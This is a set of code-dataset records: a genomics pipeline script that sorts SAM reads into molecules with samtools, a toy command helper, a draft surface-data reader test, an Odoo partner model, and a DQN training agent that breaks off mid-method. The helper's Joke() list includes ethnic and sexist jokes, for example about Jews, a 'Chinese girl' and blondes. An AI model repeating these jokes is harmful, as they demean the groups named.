1\r\n\t\t\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\t\t\tmolecule_length_distribution[small_cf] += 1\r\n\t\t\t\t\t\t\t\t\t\toutmoleculeinfo = \"\\t\".join([chrid, str(minpos), str(maxpos), str(small_cf), str(qn), barcodeinfo[0], str(mol_id), info_detail_list[0], info_detail_list[1], str(len(info_detail_list[9]))]) + \"\\n\"\r\n\r\n\t\t\t\t\t\t\t\t\t\tif barcodeinfo[0] not in barcode_molecule_amount:\r\n\t\t\t\t\t\t\t\t\t\t\tbarcode_molecule_amount[barcodeinfo[0]][mol_id] = 1\r\n\t\t\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\t\t\tif mol_id not in barcode_molecule_amount[barcodeinfo[0]]:\r\n\t\t\t\t\t\t\t\t\t\t\t\tbarcode_molecule_amount[barcodeinfo[0]][mol_id] = 1\r\n\r\n\t\t\t\t\t\t\t\t\t\tif mol_id not in molecule_really_covered:\r\n\t\t\t\t\t\t\t\t\t\t\tmolecule_really_covered[mol_id].append(small_cf)\r\n\t\t\t\t\t\t\t\t\t\t\tmolecule_really_covered[mol_id].append(len(info_detail_list[9]))\r\n\t\t\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\t\t\tmolecule_really_covered[mol_id][1] += len(info_detail_list[9])\r\n\r\n\t\t\t\t\t\t\t\t\t\tif molecule_length > 0 and molecule_length < small_cf:\r\n\t\t\t\t\t\t\t\t\t\t\tmolecule_pass = 1\r\n\t\t\t\t\t\t\t\t\t\t\tpass_filtered_info_list = info_detail_list[0:11]\r\n\t\t\t\t\t\t\t\t\t\t\tfor tag_info in range(11, len(info_detail_list)):\r\n\t\t\t\t\t\t\t\t\t\t\t\tif info_detail_list[tag_info].startswith(\"BI:Z:\") or 
info_detail_list[tag_info].startswith(\"BD:Z:\"):\r\n\t\t\t\t\t\t\t\t\t\t\t\t\tpass\r\n\t\t\t\t\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\t\t\t\t\tpass_filtered_info_list.append(info_detail_list[tag_info])\r\n\t\t\t\t\t\t\t\t\t\t\tpass_filtered_info = \"\\t\".join(pass_filtered_info_list) + \"\\n\"\r\n\t\t\t\t\t\t\t\t\t\t\twfiltered_samfile.write(pass_filtered_info)\r\n\t\t\t\t\t\t\t\t\t\twmarked_molecule.write(outmoleculeinfo.encode())\r\n\t\t\t\t\t\t\t\t\tmol_id += 1\r\n\t\t\t\t\t\t\t\t\ttmpsaminfodict = dict()\r\n\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\tfor readid_ in tmpsaminfodict.keys():\r\n\t\t\t\t\t\t\t\t\t\tbroken_info = tmpsaminfodict[readid_] + \"\\n\"\r\n\t\t\t\t\t\t\t\t\t\twfailed_samfile.write(broken_info)\r\n\t\t\t\t\t\t\t\t\ttmpsaminfodict = dict()\r\n\r\n#\t\t\t\t\t\t\t\tfor barcode_molecule_barcode in barcode_molecule_amount.keys():\r\n#\t\t\t\t\t\t\t\t\tseparate_num = len(barcode_molecule_amount[barcode_molecule_barcode].keys())\r\n#\t\t\t\t\t\t\t\t\tinfo = barcode_molecule_barcode + \"\\t\" + str(separate_num) + \"\\n\"\r\n#\t\t\t\t\t\t\t\t\twbarcode_molecule_amount_file.write(info)\r\n\t\t\t\t\t\t\t\tbarcode_molecule_amount = defaultdict(dict)\r\n\r\n\t\t\t\t\t\t\t\tfor mol_id_key in molecule_really_covered.keys():\r\n\t\t\t\t\t\t\t\t\tsmall_cfcf_rate = 1.0 * molecule_really_covered[mol_id_key][1] / molecule_really_covered[mol_id_key][0]\r\n\t\t\t\t\t\t\t\t\tinfo = str(mol_id_key) + \"\\t\" + str(molecule_really_covered[mol_id_key][0]) + \"\\t\" + str(molecule_really_covered[mol_id_key][1]) + \"\\t\" + str(small_cfcf_rate) + \"\\n\"\r\n\t\t\t\t\t\t\t\t\twmolecule_really_covered_file.write(info)\r\n\t\t\t\t\t\t\t\t\tsmall_cfcf_rate_expand = int(100 * small_cfcf_rate)\r\n\t\t\t\t\t\t\t\t\tmolecule_coverage_distribution[small_cfcf_rate_expand] += 1\r\n\t\t\t\t\t\t\t\t\tmolecule_coverage_distribution_sum += 1\r\n\r\n\t\t\t\t\t\t\t\tmolecule_really_covered = defaultdict(list)\r\n\t\t\t\t\t\t\t\tbarcode_molecule_amount = defaultdict(dict)\r\n\t\t\t\t\t\t\t\tallbarcode = dict()\r\n\t\t\t\t\t\t\t\treadid_dict = defaultdict(int)\r\n\t\t\t\t\t\t\t\tmolecule = defaultdict(list)\r\n\t\t\t\t\t\t\t\tmolecule2 = defaultdict(list)\r\n\t\t\t\t\t\t\t\tmolecule3 = defaultdict(int)\r\n\t\t\t\t\t\t\t\tmolecule4 = defaultdict(list)\r\n\t\t\t\t\t\t\t\tallbarcode[bc] = bc\r\n\t\t\t\t\t\t\t\treadid_dict[saminfolist[0]] = 1\r\n\t\t\t\t\t\t\t\tmolecule[mol_id].append(start_pos)\r\n\t\t\t\t\t\t\t\tmolecule2[mol_id].append(end_pos)\r\n\t\t\t\t\t\t\t\tmolecule3[mol_id] = readlength\r\n\t\t\t\t\t\t\t\tmolecule4[mol_id].append(saminfo)\r\n\r\n\t\t\tif molecule_length > 0:\r\n\t\t\t\twfiltered_samfile.close()\r\n\t\t\t\twfailed_samfile.close()\r\n\t\t\t\ttmpshell = filtered_samfile + \".sh\"\r\n\t\t\t\ttmpdir = os.path.dirname(tmpshell)\r\n\t\t\t\tfiltered_bamfile = filtered_samfile.replace(\"filtered.sam\", \"filtered.bam\")\r\n\t\t\t\tfailed_bamfile = failed_samfile.replace(\"failed.sam\", \"failed.bam\")\r\n\t\t\t\twtmpshell = open(tmpshell, 'w')\r\n\t\t\t\tsv = self.find_samtools_version(samtools_path, tmpdir)\r\n\t\t\t\tif sv == 0:\r\n\t\t\t\t\tshell_line = \" \".join([samtools_path, \"view -h -S\", filtered_samfile, \"-b >\", filtered_samfile + \".bam\\n\", samtools_path, \"sort -m 500M\", filtered_samfile + \".bam\", filtered_bamfile, \"\\nmv\", filtered_bamfile + \".bam\", filtered_bamfile, \"\\n\"])\r\n\t\t\t\t\twtmpshell.write(shell_line)\r\n\t\t\t\t\tshell_line = \" \".join([samtools_path, \"view -h -S\", failed_samfile, \"-b >\", failed_samfile + \".bam\\n\", samtools_path, \"sort -m 
500M\", failed_samfile + \".bam\", failed_bamfile, \"\\nmv\", failed_bamfile + \".bam\", failed_bamfile, \"\\n\"])\r\n\t\t\t\t\twtmpshell.write(shell_line)\r\n\t\t\t\telse:\r\n\t\t\t\t\tshell_line = \" \".join([samtools_path, \"view -h -S\", filtered_samfile, \"-b |\", samtools_path, \"sort -m 500M -T - -o\", filtered_bamfile, \"\\n\"])\r\n\t\t\t\t\twtmpshell.write(shell_line)\r\n\t\t\t\t\tshell_line = \" \".join([samtools_path, \"view -h -S\", failed_samfile, \"-b |\", samtools_path, \"sort -m 500M -T - -o\", failed_bamfile, \"\\n\"])\r\n\t\t\t\t\twtmpshell.write(shell_line)\r\n\t\t\t\tshell_line = \" \".join([samtools_path, \"index\", filtered_bamfile, filtered_bamfile + \".bai\\n\"])\r\n\t\t\t\twtmpshell.write(shell_line)\r\n\t\t\t\tshell_line = \" \".join([samtools_path, \"index\", failed_bamfile, failed_bamfile + \".bai\\n\"])\r\n\t\t\t\twtmpshell.write(shell_line)\r\n\t\t\t\twtmpshell.close()\r\n\t\t\t\tsubprocess.call([\"sh\", tmpshell])\r\n\t\t\t\tsubprocess.call([\"rm\", tmpshell])\r\n\r\n\t\t\t\tfilter_molecule_bam_list.append(filtered_bamfile)\r\n\t\t\t\tfailed_molecule_bam_list.append(failed_bamfile)\r\n\t\t\tsamfile.close()\r\n\t\twmarked_molecule.close()\r\n\t\tsamfile_list.close()\r\n#\t\twbroken_molecule.close()\r\n\r\n\t\tfilter_merge_bam = (sorted_bam + \".filtered\").replace(\"bam.filtered\", \"filtered.bam\")\r\n\t\tfailed_merge_bam = filter_merge_bam.replace(\"filtered.bam\", \"failed.bam\")\r\n\t\tif molecule_length > 0 and len(filter_molecule_bam_list) > 0:\r\n\t\t\tshelldir = os.path.dirname(sorted_bam) + \"/shell\"\r\n\t\t\tif os.path.isdir(shelldir):\r\n\t\t\t\tpass\r\n\t\t\telse:\r\n\t\t\t\tos.makedirs(shelldir)\r\n\t\t\ttmpshell = shelldir + \"/merge_molecule_filtered_bam.sh\"\r\n\t\t\twtmpshell = open(tmpshell, 'w')\r\n\t\t\tif len(filter_molecule_bam_list) > 1:\r\n\t\t\t\tfiltered_bam_name = \" \".join(filter_molecule_bam_list)\r\n\t\t\t\tfailed_bam_name = \" \".join(failed_molecule_bam_list)\r\n\t\t\t\tshell_line = \" \".join([samtools_path, \"merge -f\", filter_merge_bam, filtered_bam_name, \"\\n\", samtools_path, \"index\", filter_merge_bam, filter_merge_bam + \".bai\\n\"])\r\n\t\t\t\twtmpshell.write(shell_line)\r\n\t\t\t\tshell_line = \" \".join([samtools_path, \"merge -f\", failed_merge_bam, failed_bam_name, \"\\n\", samtools_path, \"index\", failed_merge_bam, failed_merge_bam + \".bai\\n\"])\r\n\t\t\t\twtmpshell.write(shell_line)\r\n\t\t\telse:\r\n\t\t\t\tshell_line = \" \".join([\"ln\", \"-s\", \"-f\", filter_molecule_bam_list[0], filter_merge_bam + \"\\n\", \"ln\", \"-s\", \"-f\", filter_molecule_bam_list[0] + \".bai\", filter_merge_bam + \".bai\\n\"])\r\n\t\t\t\twtmpshell.write(shell_line)\r\n\t\t\t\tshell_line = \" \".join([\"ln\", \"-s\", \"-f\", failed_molecule_bam_list[0], failed_bam_name + \"\\n\", \"ln\", \"-s\", \"-f\", failed_molecule_bam_list[0] + \".bai\", failed_merge_bam + \".bai\\n\"])\r\n\t\t\t\twtmpshell.write(shell_line)\r\n\t\t\twtmpshell.close()\r\n\t\t\tsubprocess.call([\"sh\", tmpshell])\r\n\t\telse:\r\n\t\t\tsubprocess.call([\"ln\", \"-s\", \"-f\", sorted_bam, filter_merge_bam])\r\n\t\t\told_bai = sorted_bam.replace(\"marked.bai\", \"marked.bam.bai\")\r\n\t\t\tnew_bai = filter_merge_bam + \".bai\"\r\n\t\t\tsubprocess.call([\"ln\", \"-s\", \"-f\", old_bai, new_bai])\r\n\r\n\t\tcfcr_stat_file = os.path.join(statistics_report_dir, \"CFCR.stat\")\r\n\t\twcfcr_stat_file = open(cfcr_stat_file, 'w')\r\n\t\tstat_line = \"Item\" + \"\\t\" + \"CF/CR length\" + \"\\t\" + \"genome_size\" + \"\\t\" + \"CF/CR 
depth\\n\"\r\n\t\twcfcr_stat_file.write(stat_line)\r\n\t\ttarget_size = int(target_size)\r\n\t\tCF_depth = all_CF / float(target_size)\r\n\t\tCR_depth = all_CR / float(all_CF)\r\n\r\n\t\tstat_line = \"CF:\" + \"\\t\" + str(all_CF) + \"\\t\" + str(target_size) + \"\\t\" + str(CF_depth) + \"\\n\"\r\n\t\twcfcr_stat_file.write(stat_line)\r\n\t\tstat_line = \"CR:\" + \"\\t\" + str(all_CR) + \"\\t\" + str(all_CF) + \"\\t\" + str(CR_depth) + \"\\n\"\r\n\t\twcfcr_stat_file.write(stat_line)\r\n\t\twcfcr_stat_file.close()\r\n\r\n\t\tmolecule_length_distribution_file = os.path.join(statistics_report_dir, \"molecule_length_distribution.txt\")\r\n\t\twmolecule_length_distribution_file = open(molecule_length_distribution_file, 'w')\r\n\t\twmolecule_length_distribution_file.write(\"molecule_length\\tamount\\n\")\r\n\t\tfor molecule_length_id in sorted(molecule_length_distribution.keys()):\r\n\t\t\tinfo = str(molecule_length_id) + \"\\t\" + str(molecule_length_distribution[molecule_length_id]) + \"\\n\"\r\n\t\t\twmolecule_length_distribution_file.write(info)\r\n\t\twmolecule_length_distribution_file.close()\r\n#\t\twbarcode_molecule_amount_file.close()\r\n\t\twmolecule_really_covered_file.close()\r\n\r\n\t\tfor n in range(0,max(molecule_coverage_distribution.keys()) + 1):\r\n\t\t\trate = round(100.0 * molecule_coverage_distribution[n] / molecule_coverage_distribution_sum, 2)\r\n\t\t\tinfo = str(n * 0.01) + \"\\t\" + str(rate) + \"\\n\"\r\n\t\t\twmolecule_coverage_distribution_file.write(info)\r\n\t\twmolecule_coverage_distribution_file.close()\r\n\r\n\t\trmarked_molecule = gzip.open(marked_molecule, 'rb')\r\n\t\tmerge_molecule_file = os.path.join(statistics_report_dir, \"fragment_info.csv\")\r\n\t\twmerge_molecule_file = open(merge_molecule_file, 'w')\r\n\t\tmolecule_id = 0\r\n\t\tmerge_molecule_info_list = list()\r\n\t\tfor mm in range(9):\r\n\t\t\tmerge_molecule_info_list.append(0)\r\n\t\tfor molecule_read_info in rmarked_molecule:\r\n\t\t\tmolecule_read_info_list = re.split(\"\\t\", molecule_read_info.decode().strip())\r\n\t\t\tif int(molecule_read_info_list[6]) == molecule_id:\r\n\t\t\t\tmerge_molecule_info_list[7] += int(molecule_read_info_list[9])\r\n\t\t\telse:\r\n\t\t\t\tif molecule_id > 0:\r\n\t\t\t\t\tmerge_molecule_info_list[8] = str(round(1.0 * merge_molecule_info_list[7] / int(merge_molecule_info_list[5]), 2))\r\n\t\t\t\t\tmerge_molecule_info_list[7] = str(merge_molecule_info_list[7])\r\n\t\t\t\t\tmerge_molecule_info = \",\".join(merge_molecule_info_list) + \"\\n\"\r\n\t\t\t\t\twmerge_molecule_file.write(merge_molecule_info)\r\n\r\n\t\t\t\t\tmerge_molecule_info_list[0] = str(molecule_read_info_list[6])\r\n\t\t\t\t\tmerge_molecule_info_list[1] = str(molecule_read_info_list[5])\r\n\t\t\t\t\tmerge_molecule_info_list[2] = str(molecule_read_info_list[0])\r\n\t\t\t\t\tmerge_molecule_info_list[3] = str(molecule_read_info_list[1])\r\n\t\t\t\t\tmerge_molecule_info_list[4] = str(molecule_read_info_list[2])\r\n\t\t\t\t\tmerge_molecule_info_list[5] = str(molecule_read_info_list[3])\r\n\t\t\t\t\tmerge_molecule_info_list[6] = str(molecule_read_info_list[4])\r\n\t\t\t\t\tmerge_molecule_info_list[7] = int(molecule_read_info_list[9])\r\n\t\t\t\t\tmolecule_id = int(molecule_read_info_list[6])\r\n\t\t\t\telse:\r\n\t\t\t\t\tmerge_molecule_info_list[0] = str(molecule_read_info_list[6])\r\n\t\t\t\t\tmerge_molecule_info_list[1] = str(molecule_read_info_list[5])\r\n\t\t\t\t\tmerge_molecule_info_list[2] = str(molecule_read_info_list[0])\r\n\t\t\t\t\tmerge_molecule_info_list[3] = 
str(molecule_read_info_list[1])\r\n\t\t\t\t\tmerge_molecule_info_list[4] = str(molecule_read_info_list[2])\r\n\t\t\t\t\tmerge_molecule_info_list[5] = str(molecule_read_info_list[3])\r\n\t\t\t\t\tmerge_molecule_info_list[6] = str(molecule_read_info_list[4])\r\n\t\t\t\t\tmerge_molecule_info_list[7] = int(molecule_read_info_list[9])\r\n\t\t\t\t\tmolecule_id = int(molecule_read_info_list[6])\r\n\t\tmerge_molecule_info_list[8] = str(round(1.0 * merge_molecule_info_list[7] / int(merge_molecule_info_list[5]), 2))\r\n\t\tmerge_molecule_info_list[7] = str(merge_molecule_info_list[7])\r\n\t\tmerge_molecule_info = \",\".join(merge_molecule_info_list) + \"\\n\"\r\n\t\twmerge_molecule_file.write(merge_molecule_info)\r\n\t\twmerge_molecule_file.close()\r\n\t\trmarked_molecule.close()\r\n\r\n\t\treturn(statistics_report_dir)\r\n\r\ndef usage():\r\n\tcalculation_usage = \\\r\n\t'''\r\n\tcalculate CF and CR\r\n\tVersion: 1.0.0\r\n\tDependencies: Python (>=3.0), SAMtools\r\n\tLast Updated Date: 2017-06-01\r\n\tContact: meijp@foxmail.com\r\n\r\n\tUsage: python calculate.py \r\n\r\n\tOptions:\r\n\t\t-i --input, path of input bam file\r\n\t\t-o --outputdir, the path of output directory\r\n\t\t-c --config, the path of configuration file [default: outdir/config/Basic.config]\r\n\t\t-m --minlen, minimum molecule length [default: 500bp]\r\n\t\t-h --help, help info\r\n\r\n\t'''\r\n\tprint(calculation_usage)\r\n\r\nif __name__ == '__main__':\r\n\tif len(sys.argv) < 5:\r\n\t\tusage()\r\n\t\tsys.exit(-1)\r\n\r\n\tinputbam = None\r\n\toutputdir = None\r\n\tConfigFile = None\r\n\tMolecule_length = 500\r\n\topts, args = getopt.gnu_getopt(sys.argv[1:], 'i:o:m:c:h', ['input=', 'outputdir=', 'minlen=', 'config=', 'help'])\r\n\tfor o, a in opts:\r\n\t\tif o == '-i' or o == '--input':\r\n\t\t\tinputbam = a\r\n\t\tif o == '-o' or o == '--outputdir':\r\n\t\t\toutputdir = a\r\n\t\tif o == '-m' or o == '--minlen':\r\n\t\t\tMolecule_length = int(a)\r\n\t\tif o == '-c' or o == '--config':\r\n\t\t\tConfigFile = a\r\n\t\tif o == '-h' or o == '--help':\r\n\t\t\tusage()\r\n\t\t\tsys.exit(-1)\r\n\r\n\tif ConfigFile is None:\r\n\t\tscript_abs_path = os.path.abspath(sys.argv[0])\r\n\t\tcreate_config_py = os.path.join(os.path.dirname(script_abs_path), \"create_config.py\")\r\n\t\tconfig_dir = os.path.join(outputdir, \"config\")\r\n\t\tif os.path.isdir(config_dir):\r\n\t\t\tpass\r\n\t\telse:\r\n\t\t\tos.mkdir(config_dir)\r\n\t\ttmpshell = os.path.join(config_dir, \"cc.sh\")\r\n\t\twtmpshell = open(tmpshell, 'w')\r\n\t\tshell_line = \" \".join([\"python\", create_config_py, \"Basic -o\", config_dir, \"\\n\"])\r\n\t\twtmpshell.write(shell_line)\r\n\t\twtmpshell.close()\r\n\t\tsubprocess.call([\"sh\", tmpshell])\r\n\t\tsubprocess.call([\"rm\", tmpshell])\r\n\t\tConfigFile = os.path.join(config_dir, \"Basic.config\")\r\n\r\n\tG = baseinfo()\r\n\tG.get_config(ConfigFile)\r\n\tsamtools = G.Samtools()\r\n\tgenomesize = G.Genomesize()\r\n\tbarcode_index = G.Barcode_index()\r\n\r\n\tC = CFCR()\r\n\tsamdir = os.path.dirname(inputbam)\r\n\tsys.stderr.write(\"[ %s ] split sam file by chr, sort sam file by barcode ... \\n\" % time.asctime())\r\n\t(Samfilepath, HeaderSamFile) = C.split_and_sort_sam(inputbam, samtools, barcode_index, samdir)\r\n\tsys.stderr.write(\"[ %s ] split and sorted sam file list: %s \\n\\n\" % (time.asctime(), Samfilepath))\r\n\r\n\tsys.stderr.write(\"[ %s ] calculating CF/CR ... 
\\n\" % time.asctime())\r\n\treport_dir = C.calculate(Samfilepath, genomesize, samdir, inputbam, samtools, Molecule_length, HeaderSamFile)\r\n\tsys.stderr.write(\"[ %s ] files of CF/CR, molecule distribution, molecule coverage and other infos have been placed in directory: %s \\n\" % (time.asctime(), report_dir))\r\n","sub_path":"src/calculate.py","file_name":"calculate.py","file_ext":"py","file_size_in_byte":28866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"319521511","text":"#This is the file for the functions\n\nimport time\nimport datetime\nimport random\n\ndef Calculator(one, two ): # calculate Command\n if(one == '' or two == ''):\n ErrorLog('Didnt enter any number', 54124)\n return 0\n else:\n ans = float(one) + float(two) # Creates a float of the first and second number\n return ans # Returns the final value\n\ndef SayHello(name): # say hello Command\n if(name == ''):\n ErrorLog('String cant be null!', 45898)\n printer = 'null'\n return printer\n else:\n printer = \"Hello %s\" % name # Creates a string that we will return later\n return printer # Returns the string\n\ndef QuitMessage(): # Message function for the quit Command\n print('Quiting...') # Prints out message that its quiting\n time.sleep(1) # Waits one second\n# Rest does the main file\n\ndef Date(): # date Command\n date = datetime.date.today() # Creates a string with today's date\n return date # Returns our date\n\ndef Time(): # time Command\n now = datetime.datetime.now().time() # Creates a string with the time\n return now # Returns the date\n\ndef Today(): # today Command\n date = datetime.date.today() # Creates a string with today's date\n now = datetime.datetime.now().time() # Creates a string with the time\n print('Today is: %s' % date) # Prints out today's date\n print('And the time is %s' % now) # Prints out the time\n\ndef Joke(): # joke Command\n jokes = ['Yo momma is so fat, I took a picture of her last Christmas and it\\'s still printing. ',\n 'Yo momma is so fat when she got on the scale it said, \\\"I need your weight not your phone number.\\\" ',\n 'I asked a Chinese girl for her number. She said, \\\"Sex! Sex! Sex! Free sex tonight!\\\" I said, \\\"Wow!\\\" Then her friend said, \\\"She means 666-3629.\\\" ',\n 'Yo momma is so fat that when she went to the beach a whale swam up and sang, \\\"We are family, even though you\\'re fatter than me.\\\" ',\n 'Do not be racist; be like Mario. He\\'s an Italian plumber, who was made by the Japanese, speaks English, looks like a Mexican, jumps like a black man, and grabs coins like a Jew! ',\n 'Yo momma is so fat, when she sat on an iPod, she made the iPad! ',\n 'Q: Why couldn\\'t the blonde add 10 + 5 on a calculator? \\n'\n 'A: She couldn\\'t find the \"10\" button. ', 'Me: Siri, where is the best place to hide a body? \\n'\n 'Siri: The second page of a Google search.',\n 'Q: Why shouldn\\'t Facebook have paid $1 billion dollars for Instagram? \\n'\n ' A: They could\\'ve downloaded it for free! ', 'Q: How easy is it to count in binary? \\n'\n 'A: It’s as easy as 01 10 11. ',\n 'I put my phone on airplane mode, but it sure ain\\'t flyin\\'. 
'] # Creates a list with all the jokes (That's why its so big)\n return random.choice(jokes) # Returns a random string from the string\n\ndef ErrorLog(error, errorNumber): # Error Function\n print('Error: %s \\n ' % error ) # Prints out the Problem\n print('Error Number: %s' % errorNumber) # Prints out the Error number\n","sub_path":"Test/Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":3218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"235673717","text":"#test without unittest, was being inefficient, these run smoother and are more portable.\n\ntestfolder=r'G:\\My Drive\\libraries\\python\\userKov3\\pySurf\\test' #for economy during development, hard coded path.\n#testfolder os.path.dirname(__file__) #to set it as relative to this file path.\n\nimport os\nfrom format_reader import read_sur\nimport numpy as np\nfrom pySurf.data2D import plot_data\n\n#ported to/from notebook\n\ndef test_zygo(wfile=None):\n\timport os\n\timport matplotlib.pyplot as plt\n\tfrom pySurf.data2D import plot_data\n\t\n\tif wfile is None:\t\n\t\trelpath=r'input_data\\zygo_data\\171212_PCO2_Zygo_data.asc'\n\t\twfile= os.path.join(testfolder,relpath)\n\t\t\n\t(d1,x1,y1)=csvZygo_reader(wfile,ytox=220/1000.,center=(0,0))\n\t(d2,x2,y2)=csvZygo_reader(wfile,ytox=220/1000.,center=(0,0),intensity=True)\n\tplt.figure()\n\tplt.suptitle(relpath)\n\tplt.subplot(121)\n\tplt.title('height map')\n\tplot_data(d1,x1,y1,aspect='equal')\n\tplt.subplot(122)\n\tplt.title('continuity map ')\n\tplot_data(d2,x2,y2,aspect='equal')\n\treturn (d1,x1,y1),(d2,x2,y2)\n\t\n'''\t\ndef csv_points_reader(wfile,*args,**kwargs):\n \"\"\"Read a processed points file in format x,y,z as csv output of analysis routines.\"\"\"\n w0=get_points(wfile,*args,**kwargs)\n w=w0.copy()\n x,y=points_find_grid(w,'grid')[1]\n pdata=resample_grid(w,matrix=True)\n return pdata,x,y\n\ndef csv_zygo_reader(wfile,*args,**kwargs):\n \"\"\"Read a processed points file in format x,y,z as csv output of analysis routines.\"\"\"\n w0=get_points(wfile,*args,**kwargs)\n w=w0.copy()\n x,y=points_find_grid(w,'grid')[1]\n pdata=resample_grid(w,matrix=True)\n return pdata,x,y\n\ndef fits_reader(fitsfile,header=False):\n \"\"\" Generic fits reader, returns data,x,y.\n \n header is ignored. If `header` is set to True is returned as dictionary.\"\"\"\n \n a=fits.open(fitsfile)\n head=a[0].header\n if header: return head\n \n data=a[0].data\n a.close()\n \n x=np.arange(data.shape[1])\n y=np.arange(data.shape[0])\n \n return data,x,y\n'''\n#used by auto_reader to open according to extension\nreader_dic={'.asc':csvZygo_reader,\n '.csv':csv4D_reader,\n #'.fits':fitsWFS_reader,\n '.txt':points_reader,\n '.sur':sur_reader,\n '.dat':points_reader}\n \nif __name__=='__main__':\n \"\"\"It is based on a tentative generic function read_data accepting among arguments a specific reader. \n The function first calls the data reader, then applies the register_data function to address changes of scale etc.\n This works well, however read_data must filter the keywords for the reader and for the register and\n this is hard coded, that is neither too elegant or maintainable. Note however that with this structure it is \n possible to call the read_data procedure with specific parameters, for example in example below, the reader for \n Zygo cannot be called directly with intensity keyword set to True without making a specific case from the other readers, \n while this can be done using read_data. 
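\n\n A minimal sketch of the intended call pattern (reader name and options are taken from the tests list below; the file path is illustrative, not a verified fixture):\n\n data, x, y = read_data('171212_PCO2_Zygo_data.asc', csvZygo_reader, strip=True, center=(10, 15), intensity=True)\n plot_data(data, x, y)\n 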
\"\"\"\n \n from pySurf.data2D import plot_data\n tests=[[sur_reader,\n r'test\\input_data\\profilometer\\04_test_directions\\05_xysurf_pp_Intensity.sur'\n ,{'center':(10,15)}],[points_reader,\n r'test\\input_data\\exemplar_data\\scratch\\110x110_50x250_100Hz_xyscan_Height_transformed_4in_deltaR.dat'\n ,{'center':(10,15)}],\n [csvZygo_reader,\n r'test\\input_data\\zygo_data\\171212_PCO2_Zygo_data.asc'\n ,{'strip':True,'center':(10,15)}],\n [csvZygo_reader,\n r'test\\input_data\\zygo_data\\171212_PCO2_Zygo_data.asc'\n ,{'strip':True,'center':(10,15),'intensity':True}]]\n\n plt.ion() \n plt.close('all')\n for r,f,o in tests: #reader,file,options\n print ('reading data %s'%os.path.basename(f))\n plt.figure()\n plt.subplot(121)\n plot_data(*r(f))\n plt.title('raw data')\n plt.subplot(122)\n data,x,y=read_data(f,r,**o)\n plot_data(data,x,y)\n plt.title('registered')\n plt.suptitle(' '.join([\"%s=%s\"%(k,v) for k,v in o.items()]))\n plt.tight_layout()\n plt.show()\nif __name__ == '__main__':\n unittest.main()","sub_path":"pySurf/readers/old/readers_dev/readers/test_read_sur2.py","file_name":"test_read_sur2.py","file_ext":"py","file_size_in_byte":4145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"303931765","text":"from openerp import api, fields, models\n\n\nclass ResPartner(models.Model):\n _inherit = 'res.partner'\n\n criticy = fields.Selection([('critical', 'Critico'), ('no_critical', 'No Critico'), ('occasional', 'Ocasional')],\n 'Criticidad', default=None)\n service_type = fields.Selection([('rental', 'Alquiler Equipos'), ('gas', 'Combustible'),\n ('buy', 'Compra de madera'), ('hardware', 'Ferreteria Industrial'),\n ('maintenance', 'Mantenimiento Automotriz'), ('move', 'Movilizacion'),\n ('civil', 'Obra Civil'), ('replacement', 'Repuesto Mecanico'),\n ('cservice', 'Servicio de Combustible'), ('a_service', 'Servicio de Alimentacion'),\n ('technical', 'Servicio Tecnico'), ('transport', 'Transporte Pesados'),\n ('treatment', 'Tratamiento Desechos')], 'Servicios Prestados')\n\n service_categ = fields.Selection([('feeding', 'Alimentacion'), ('eq_rental', 'Alquiler de Equipos'),\n ('car_rental', 'Alquiler de Vehiculos'),\n ('hardware', 'Ferreteria, equipos y herramientas'),\n ('others', 'Otros'), ('gas_provision', 'Provision de Combustible y Lubricantes'),\n ('wood_provision', 'Provision de Madera'),\n ('replacement', 'Repuesto, Mecanica y mantenimiento'),\n ('transport', 'Transporte')], 'Categorizacion de servicios')\n\n region = fields.Selection([('coast', 'Costa'), ('sierra', 'Sierra'), ('east', 'Oriente'),\n ('inter', 'Internacional')], 'Region')\n\n canton_id = fields.Many2one('canton.state', 'Canton')\n parish_id = fields.Many2one('parish.state', 'Parroquia')\n\nResPartner()\n\n\nclass ParishState(models.Model):\n _name = 'parish.state'\n\n name = fields.Char('Nombre Parroquia', required=True)\n code = fields.Char('Codigo')\n\nParishState()\n\n\nclass CantonState(models.Model):\n _name = 'canton.state'\n\n name = fields.Char('Nombre Canton', required=True)\n code = fields.Char('Codigo')\n\nCantonState()\n","sub_path":"invoice_control/partner.py","file_name":"partner.py","file_ext":"py","file_size_in_byte":2319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"172446422","text":"import model\nimport torch.nn.init as init\nimport torch.nn as nn\nimport random\nimport numpy as np\nimport torch.optim as optim\nimport torch\nimport utils\nimport copy\nimport 
time\n\n\"\"\"\nhttps://curt-park.github.io/2018-05-17/dqn/ ==> hyperparameter list\nhttps://towardsdatascience.com/deep-q-network-dqn-ii-b6bf911b6b2c ==> reference\n\"\"\"\n\n\nclass Agent:\n\n def __init__(self, env, env_name,storage, explore, lmbda, num_actions, device, explore_timesteps, writer):\n self.env_name = env_name\n self.action_space = env.action_space\n self.train_net = model.DQN(env.observation_space.shape, env.action_space.n).to(device)\n self.target_net = model.DQN(env.observation_space.shape,env.action_space.n).to(device)\n self.storage = storage\n self.env = env\n self.init_explore = 1\n self.final_explore = explore\n self.explore_timesteps = explore_timesteps\n self.lmbda = lmbda\n self.device = device\n self.writer = writer\n self.loss_array = []\n\n # initialize target_net with train_net parameters\n self.target_net.load_state_dict(self.train_net.state_dict())\n\n # Always, only the train_net should be trained\n self.train_net.train()\n self.target_net.eval()\n\n #The Huber loss\n self.loss_func = nn.SmoothL1Loss()\n\n #TODO : implement anneealing learning rate\n self.optimizer = optim.Adam(self.train_net.parameters(), lr = 0.00025)\n\n # Attributes to save the best model\n self.best_reward_mean = None\n self.best_model = None\n\n def action(self, observation):\n with torch.no_grad():\n observation = torch.tensor(observation, dtype = torch.float32).to(self.device)\n action_scores = self.train_net(observation.unsqueeze(0)).cpu()\n action = np.argmax(action_scores)\n return action\n\n def train(self, num_timesteps):\n\n mean_reward_list = []\n tot_reward = 0\n current_state = self.env.reset()\n current_state = torch.FloatTensor(current_state)\n num_episodes = 0\n done = False\n for timestep in 